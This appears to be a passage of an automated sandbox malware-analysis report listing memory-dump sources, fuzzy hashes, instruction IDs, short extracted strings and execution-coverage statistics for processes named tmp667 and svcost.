                                                                                                • Instruction Fuzzy Hash: A2E01274D09208EBC704DF94EA519ADBB7AEB46304F20D1EDC80A17741CB329E46DB81
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.446508934.00000000006D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006D0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_6d0000_tmp667.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 8078787e253e437957cb5d22b93f5194d258a96f786f5e1c1df3edd6a18201e6
                                                                                                • Instruction ID: 0fecb511624af91e5eb0237c8c8fefb823fbe485415ccf4ffc79e66dbc0d397e
                                                                                                • Opcode Fuzzy Hash: 8078787e253e437957cb5d22b93f5194d258a96f786f5e1c1df3edd6a18201e6
                                                                                                • Instruction Fuzzy Hash: 43E01274D4634DEFCB40DFB8D95969DBBB8EB45311F1041A9C809A3350EB305A95CF51
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.446656192.0000000000D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_d50000_tmp667.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 5ea64f1a295acb8e91bb4a965db867b2bc66730c1b7e0e913794a5af53835025
                                                                                                • Instruction ID: 73ae63581203db9c294dc1eb5e9ce2178fb42f67b050da213d96320a16f4366a
                                                                                                • Opcode Fuzzy Hash: 5ea64f1a295acb8e91bb4a965db867b2bc66730c1b7e0e913794a5af53835025
                                                                                                • Instruction Fuzzy Hash: 6EE0EC34945208EFCB40DFB8E95D6ADBBB8AB05305F2041A98C49A3250EB715A88DF51
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.446656192.0000000000D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_d50000_tmp667.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 1ded72a0b3a48cf5a2062b9e1916c1b7de2b1d81e197e8f43cf3c2b799c28089
                                                                                                • Instruction ID: 8807b3db525226609874358d3348e3e24fb9eddf940a46d5b4bb383cd85269ea
                                                                                                • Opcode Fuzzy Hash: 1ded72a0b3a48cf5a2062b9e1916c1b7de2b1d81e197e8f43cf3c2b799c28089
                                                                                                • Instruction Fuzzy Hash: 57E0C234905208EBCB04DF94DA5096CBB78EF4A305F24C1ECCC081B340CB32AE4ACB90
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.452343355.0000000005400000.00000040.00000800.00020000.00000000.sdmp, Offset: 05400000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_5400000_tmp667.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 397783d3d9e11f039688b81e204b450c9bcb0f9e9f276188419dd269dc0ad035
                                                                                                • Instruction ID: 0769e5b9138d99a3e106f54d9c9b4042589e84cb38858306fc42bc162dd94ace
                                                                                                • Opcode Fuzzy Hash: 397783d3d9e11f039688b81e204b450c9bcb0f9e9f276188419dd269dc0ad035
                                                                                                • Instruction Fuzzy Hash: 3BE0127190620CEBDB04FFB4C914B9E77A8EB42308F5040B9D50597250EE325A189BD6
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.452343355.0000000005400000.00000040.00000800.00020000.00000000.sdmp, Offset: 05400000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_5400000_tmp667.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 296862a82c0f6839d2d22e188db38e96168dfa00e340ff56e8a5edc0dd7fd043
                                                                                                • API ID:
                                                                                                • String ID: oV
                                                                                                • API String ID: 0-2220627765
                                                                                                • Opcode ID: b33bbba6d752df0ba9d4b602084054c63529604fd7bddf7648de924ff34172d9
                                                                                                • Instruction ID: 8da62d378ccae228649df71c7e1b0355d41dcaad3521441e83d6bb8f5f18edf6
                                                                                                • Opcode Fuzzy Hash: b33bbba6d752df0ba9d4b602084054c63529604fd7bddf7648de924ff34172d9
                                                                                                • Instruction Fuzzy Hash: 939107B4A45218CFEB54DF68D484BEEBBF6BB49300F2091AAD419A7399DB305D85CF40
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.452343355.0000000005400000.00000040.00000800.00020000.00000000.sdmp, Offset: 05400000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_5400000_tmp667.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: Wzb
                                                                                                • API String ID: 0-2715965760
                                                                                                • Opcode ID: ab03bb4a6b2ee221c88e250d67669b896321c099844b4b89ae9ab69999a281c0
                                                                                                • Instruction ID: 566bc15799e46aa7a35532eb5611c8a17809b936b04d8b62f18eb87042a9ded6
                                                                                                • Opcode Fuzzy Hash: ab03bb4a6b2ee221c88e250d67669b896321c099844b4b89ae9ab69999a281c0
                                                                                                • Instruction Fuzzy Hash: EA713A78A05218DFDB54DF28D859BADBBF6FB49300F5080AAE81AA7394DB355D80CF05
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.446542643.00000000006F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006F0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_6f0000_tmp667.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: oV
                                                                                                • API String ID: 0-2220627765
                                                                                                • Opcode ID: 1572caec914ba6c14d5edef9b2f7b411001a3c65f7239b72849fff2baa6b9e5e
                                                                                                • Instruction ID: 8d99b257b6eb01ce601d897f2f23ec4f27842815df9394c823ad05935a380084
                                                                                                • Opcode Fuzzy Hash: 1572caec914ba6c14d5edef9b2f7b411001a3c65f7239b72849fff2baa6b9e5e
                                                                                                • Instruction Fuzzy Hash: 7E51E170E0521CCBEB14CF9AD944BADBBF6BF89300F2090AAD509AB365D7755985CF01
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.446542643.00000000006F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006F0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_6f0000_tmp667.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: oV
                                                                                                • API String ID: 0-2220627765
                                                                                                • Opcode ID: ca786b978e59ea1e28a436ce8d091bb758a80f5e3b0f9ad81be785e5ac2c01ae
                                                                                                • Instruction ID: c1917de9970a0775cb73474105556d12439196ef49cecdd6d11670bd2655bbd4
                                                                                                • Opcode Fuzzy Hash: ca786b978e59ea1e28a436ce8d091bb758a80f5e3b0f9ad81be785e5ac2c01ae
                                                                                                • Instruction Fuzzy Hash: C251047490521CCFDB10EFA8E958BEDBBF6BB49304F20602AD505A739AD7745946CF04
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.446542643.00000000006F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006F0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_6f0000_tmp667.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: oV
                                                                                                • API String ID: 0-2220627765
                                                                                                • Opcode ID: 5866cfb5cb54c797c7e7a219fbc4801be45986a02b5fba24c3a19604d6f2a8db
                                                                                                • Instruction ID: eda88de7c2c5f25da47f54f3bd615f1516ead3ba2bfdf4df3ca7d4be33b7f1d9
                                                                                                • Opcode Fuzzy Hash: 5866cfb5cb54c797c7e7a219fbc4801be45986a02b5fba24c3a19604d6f2a8db
                                                                                                • Instruction Fuzzy Hash: BD51037490521CCFDB10EFA8E958BEDBBF6BB49304F20602AD519A739AD7749946CF00
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.446656192.0000000000D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_d50000_tmp667.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: )
                                                                                                • API String ID: 0-2427484129
                                                                                                • Opcode ID: c25cae032b133d675e9eccb51e96f9826c08b699a8cd346f97bf59aa72ce749d
                                                                                                • Instruction ID: 21ec38fc8f0bfedd1c473e4ee6ec6d3dd2918cd3138b5b497184f754fb79e8b9
                                                                                                • Opcode Fuzzy Hash: c25cae032b133d675e9eccb51e96f9826c08b699a8cd346f97bf59aa72ce749d
                                                                                                • Instruction Fuzzy Hash: D2413171D05A588BEB1CCF6B8D4069EFAF7AFC9301F14D1B9881CAA259EB3045468F51
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.446508934.00000000006D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006D0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_6d0000_tmp667.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: cb3eaf7795797aa4aa477b174add8d2bdd47620b5db45fd5cb9dd0ff7613fb3c
                                                                                                • Instruction ID: 113935667dc38ce4df4dd201fcaf92ef56d72797eca38613fd671d77a1a984c9
                                                                                                • Opcode Fuzzy Hash: cb3eaf7795797aa4aa477b174add8d2bdd47620b5db45fd5cb9dd0ff7613fb3c
                                                                                                • Instruction Fuzzy Hash: 8612B370E006598BDB14CFAAC98069DFBF2BF88314F24C56AD459EB31AD734A946CF50
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.451858888.0000000004980000.00000040.00000800.00020000.00000000.sdmp, Offset: 04980000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_4980000_tmp667.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 0f31d044ec4b947d460900d676e382ef31bd8726edce34813b828e0d28c3f467
                                                                                                • Instruction ID: d0ac67710ec4d2dd21b3ca15ac48e1c43461d6671b0b22f5f34c7f5c5fd21d64
                                                                                                • Opcode Fuzzy Hash: 0f31d044ec4b947d460900d676e382ef31bd8726edce34813b828e0d28c3f467
                                                                                                • Instruction Fuzzy Hash: 53512B71E016688BEB6CCF1B8D546CAFAF3AFC9300F14C1FA994CA6254DB715A858E41
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.451858888.0000000004980000.00000040.00000800.00020000.00000000.sdmp, Offset: 04980000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_4980000_tmp667.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: abd358b75739abc5e914e6a16b9d23054ada79601b57f28245aa580728697752
                                                                                                • Instruction ID: 13b762dee7d0482bbbbb79fdb7b8ebde5d5461e020899f6513ef5d5c8171b881
                                                                                                • Opcode Fuzzy Hash: abd358b75739abc5e914e6a16b9d23054ada79601b57f28245aa580728697752
                                                                                                • Instruction Fuzzy Hash: 7F41DEB4D003489FDB14DFA9D985A9EBBF1BB19304F20952AE818AB290D7B4A845CF45
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.446416761.0000000000600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00600000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_600000_tmp667.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 8c0412386d253653200f58d6d18e2c587ee6109fed1bd10ff599bedd40fea53b
                                                                                                • Instruction ID: 7fed239b7ca35f912a5f5a2128e7cbe2ffaaa45c081b94df989dd6cba9254124
                                                                                                • Opcode Fuzzy Hash: 8c0412386d253653200f58d6d18e2c587ee6109fed1bd10ff599bedd40fea53b
                                                                                                • Instruction Fuzzy Hash: CD21BEB5D002189FDB14CFA9D884AEEFBF5EB49314F14942AE804B7250C735A905CFA5
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.446508934.00000000006D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006D0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_6d0000_tmp667.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 58cecd75200a91a1ef5908d411ced8858179e2a8ad3738ccec9d2c193381c002
                                                                                                • Instruction ID: 6debda26bfc25ccad919096a5fe6ab33b79b7f939822cbb02b67919523449797
                                                                                                • Opcode Fuzzy Hash: 58cecd75200a91a1ef5908d411ced8858179e2a8ad3738ccec9d2c193381c002
                                                                                                • Instruction Fuzzy Hash: 4821CC71E056289BDB18CF6BD9402DDFAF7AFC9310F14C0BAD909A6214DB300A968E44
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.446508934.00000000006D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006D0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_6d0000_tmp667.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: S$X$c$c$$oV
                                                                                                • API String ID: 0-3883161067
                                                                                                • Opcode ID: f89221adb9c4d6435d210daf5292322856a50d4c3391651eacee38a26d791152
                                                                                                • Instruction ID: 8a1946a09b4b867b84bbe2fa24587115abaac4dd5252f116d534b8cd07f3518f
                                                                                                • Opcode Fuzzy Hash: f89221adb9c4d6435d210daf5292322856a50d4c3391651eacee38a26d791152
                                                                                                • Instruction Fuzzy Hash: 79211470D04219CFDB60DF54C8987EDBBB6AB45314F2040EAE419AB390DB704E85DF5A
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.446459058.00000000006B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_6b0000_tmp667.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: +$,$D$oV
                                                                                                • API String ID: 0-4285723052
                                                                                                • Opcode ID: a253415c35f21a782cb889c553a242d190c970961e5fa312602b2e51fce2ea1e
                                                                                                • Instruction ID: f7164e893657f61aee3d386983ab2855dfd8ae6094fe7aef984093c1eb42cae5
                                                                                                • Opcode Fuzzy Hash: a253415c35f21a782cb889c553a242d190c970961e5fa312602b2e51fce2ea1e
                                                                                                • Instruction Fuzzy Hash: C321EEB4901269CFDB24EF58E988BDCB7B2AB49315F1090EAD619A7344D7709E81CF14
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.446459058.00000000006B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_6b0000_tmp667.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: +$,$D$oV
                                                                                                • API String ID: 0-4285723052
                                                                                                • Opcode ID: 2d5c480d2f2641e6e678606abdf11926d9e62b333d29bde5f4baede2f63f578b
                                                                                                • Instruction ID: a2c64a8e4afb9196c34bd5f68cb05a45e9f2ab7dddd4aa1c14971ee46e4a5efd
                                                                                                • Opcode Fuzzy Hash: 2d5c480d2f2641e6e678606abdf11926d9e62b333d29bde5f4baede2f63f578b
                                                                                                • Instruction Fuzzy Hash: 0221DBB4901268CFDB24EF58D898BD8B7F6EB49315F1090EADA19A7344C7749E85CF08
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.446459058.00000000006B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_6b0000_tmp667.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: )$+$2$oV
                                                                                                • API String ID: 0-1288159413
                                                                                                • Opcode ID: b3eeaf03510a38d3d7554cc8f9111eb9fc3f2400ae28fc2903837b458661c13e
                                                                                                • Instruction ID: b7f21efa497c8566182e30a419a7e962820048626e3429b50cf41cb69305f6a7
                                                                                                • Opcode Fuzzy Hash: b3eeaf03510a38d3d7554cc8f9111eb9fc3f2400ae28fc2903837b458661c13e
                                                                                                • Instruction Fuzzy Hash: 1B21CEB4901268CFDB24EF58D888BDCB7B2FB49315F5091A6DA1AA7354C3745E85CF04
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.446508934.00000000006D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006D0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_6d0000_tmp667.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: +$1$K$oV
                                                                                                • API String ID: 0-1421157475
                                                                                                • Opcode ID: e937e77bd6f06d7293567a35840a49db465764ca16b718325ca281ef81ff2102
                                                                                                • Instruction ID: 5efb6476c6dc18d9f5fe9e2d0fb913c514e1829e84331e29db4a1c1f5fd7928b
                                                                                                • Opcode Fuzzy Hash: e937e77bd6f06d7293567a35840a49db465764ca16b718325ca281ef81ff2102
                                                                                                • Instruction Fuzzy Hash: A3110474E04219CFDB61EF68D98879DBBF1FB49310F1401A6E409AB380CB749A81CF05
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.446508934.00000000006D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006D0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_6d0000_tmp667.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: O$a$d$c$
                                                                                                • API String ID: 0-3986790086
                                                                                                • Opcode ID: 6350be7a9ac3562f29df3c5e366788c63f31d8bfe0fe48d2f3664870df615f95
                                                                                                • Instruction ID: bfcfbf35e54cf35cd154220e7b517b5fe3fbdb49c2ae2748013df78df6dd1e60
                                                                                                • Opcode Fuzzy Hash: 6350be7a9ac3562f29df3c5e366788c63f31d8bfe0fe48d2f3664870df615f95
                                                                                                • Instruction Fuzzy Hash: 88F0DAB4D04359CEDF608F54C8987DDBAB2AB4A311F241097D5497A380DB7489C58B1A

                                                                                                Execution Graph

                                                                                                Execution Coverage:9.7%
                                                                                                Dynamic/Decrypted Code Coverage:73%
                                                                                                Signature Coverage:0%
                                                                                                Total number of Nodes:63
                                                                                                Total number of Limit Nodes:3

                                                                                                Control-flow Graph

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474290985.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c20000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: f"p$8$`Xh$l:$l:$l:$l:$l:$x:$x:$x:$:$:$:$:
                                                                                                • API String ID: 0-1956871077
                                                                                                • Opcode ID: b637b39e2e26d2dfbee819fbbabd50ce4b4a5cb972d0196d4f07eb03d43f9e2b
                                                                                                • Instruction ID: 94b52c918d720f402b8d8857438e63e7d9a7d9359d98b524ce7063b442021a7d
                                                                                                • Opcode Fuzzy Hash: b637b39e2e26d2dfbee819fbbabd50ce4b4a5cb972d0196d4f07eb03d43f9e2b
                                                                                                • Instruction Fuzzy Hash: C252D675E002288FDB65DF69C890AD9B7B5FF89310F5082EAD809A7355DB30AE85CF50

                                                                                                Control-flow Graph

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474290985.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c20000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: f"p$`Xh$h$x:$x:$x:
                                                                                                • API String ID: 0-2585101112
                                                                                                • Opcode ID: 20f3886cb734b5c41886a51ca6f17fdde132084167a69e9db6960b09af2424d1
                                                                                                • Instruction ID: 08739406a6b0024053327848218fdf175533eccdb87aa33ea6f9b20dc7fcc35d
                                                                                                • Opcode Fuzzy Hash: 20f3886cb734b5c41886a51ca6f17fdde132084167a69e9db6960b09af2424d1
                                                                                                • Instruction Fuzzy Hash: 2B810575E042288FDB65DF69D850BD9B7B2FF89300F1082EAD819A7254DB306E85CF51

                                                                                                Control-flow Graph

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474322665.0000000000C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C40000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c40000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 0l:$2$H<:$Lk:$`Xh
                                                                                                • API String ID: 0-3924731554
                                                                                                • Opcode ID: 85fe6ad756a7bb87bbe4b0232d769c8d4fd601eb2a342ec2f2b6c2568321296c
                                                                                                • Instruction ID: 91ff668b8fe0797079eb74f41d84d2cee282ac998c89897e5df103b68aa742e4
                                                                                                • Opcode Fuzzy Hash: 85fe6ad756a7bb87bbe4b0232d769c8d4fd601eb2a342ec2f2b6c2568321296c
                                                                                                • Instruction Fuzzy Hash: 48E2F574A142288FCB65DF69D884BDDBBB6FB89301F1081E9E809A7355DB706E85CF40

                                                                                                Control-flow Graph

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.473596557.0000000000310000.00000040.00000800.00020000.00000000.sdmp, Offset: 00310000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_310000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 0:$TJ"p$p!p$xb p
                                                                                                • API String ID: 0-3026496591
                                                                                                • Opcode ID: 71ce13d894cd4b53c0f5cf61e17f61f4910b1ee8f8df89d1e6465ea696f80ed6
                                                                                                • Instruction ID: c272fca33cf0e0946237ab6c740ccc567569b992ed651bd294ff6374709cba2e
                                                                                                • Opcode Fuzzy Hash: 71ce13d894cd4b53c0f5cf61e17f61f4910b1ee8f8df89d1e6465ea696f80ed6
                                                                                                • Instruction Fuzzy Hash: ADA2A475A00228CFDB65CF69C984ADDBBB2BF89304F1581E9D509AB365DB319E81CF40

                                                                                                Control-flow Graph

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474322665.0000000000C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C40000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c40000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: `Xh$`{:$`{:
                                                                                                • API String ID: 0-1737831806
                                                                                                • Opcode ID: c45c7a10098453b636bef80c5a23b3ae97339983aab9ebfff86774090719a19e
                                                                                                • Instruction ID: 29ab97c09b91cd69e6af0e8c3f9524954c55532d94d927ca87d7de68f651c3f0
                                                                                                • Opcode Fuzzy Hash: c45c7a10098453b636bef80c5a23b3ae97339983aab9ebfff86774090719a19e
                                                                                                • Instruction Fuzzy Hash: 6952C574A146288FCB65DF28CD84B9AB7B5FB89301F5081E9D90DA7355DB30AE81CF50
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.477298141.0000000004320000.00000040.00000800.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_4320000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: ,!p$4
                                                                                                • API String ID: 0-2717623955
                                                                                                • Opcode ID: 536cb7ee6e54f8636a2c90c58499f3f9ad697537921bcf1f7e1bffd73dc6846c
                                                                                                • Instruction ID: 1342e8f16142b66f1472991cfec3a1aa2b668b9c9ebda1be8ed6367ae418bf2a
                                                                                                • Opcode Fuzzy Hash: 536cb7ee6e54f8636a2c90c58499f3f9ad697537921bcf1f7e1bffd73dc6846c
                                                                                                • Instruction Fuzzy Hash: B0B21634A00228DFDB14DFA4C994BADB7B6FF88700F1595A9E505AB3A5DB70AC81CF50
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.477298141.0000000004320000.00000040.00000800.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_4320000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: ,!p$4
                                                                                                • API String ID: 0-2717623955
                                                                                                • Opcode ID: 77b1662bb3f297d80928f67964c786c19ac9481222de4ce08bc130d0fe3863dd
                                                                                                • Instruction ID: 39b3fee483bd826b11c9588f4246d91cc40014d5d63a233132fe890666aad4f0
                                                                                                • Opcode Fuzzy Hash: 77b1662bb3f297d80928f67964c786c19ac9481222de4ce08bc130d0fe3863dd
                                                                                                • Instruction Fuzzy Hash: DA220B34A00628CFDB24DF64C994BADB7B6FF48300F1591A9E509AB3A5DB70AD81CF50
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474290985.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c20000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: `Xh
                                                                                                • API String ID: 0-2258447364
                                                                                                • Opcode ID: 971bab5e61910a736fffafc78e2c39741599cdf9f5bab0c86394f35fa037db01
                                                                                                • Instruction ID: 56d8ac96024adf93bb0edc1174d680225900c90150ebbf2f350a63c903a4dd48

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.473596557.0000000000310000.00000040.00000800.00020000.00000000.sdmp, Offset: 00310000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_310000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: (!p$(!p$(!p$(!p$(!p
                                                                                                • API String ID: 0-3955841951

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474322665.0000000000C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C40000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c40000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: ^$^$`Xh
                                                                                                • API String ID: 0-2736043617

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.477406746.0000000005400000.00000040.00000800.00020000.00000000.sdmp, Offset: 05400000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_5400000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: <`:$T$`Xh
                                                                                                • API String ID: 0-4124483227

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474290985.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c20000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: +$/$`Xh
                                                                                                • API String ID: 0-3656810642

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.477298141.0000000004320000.00000040.00000800.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_4320000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 0:$"$(
                                                                                                • API String ID: 0-1845404371

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474322665.0000000000C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C40000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c40000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: >$>$:
                                                                                                • API String ID: 0-3988283215

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.473596557.0000000000310000.00000040.00000800.00020000.00000000.sdmp, Offset: 00310000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_310000_svcost.jbxd
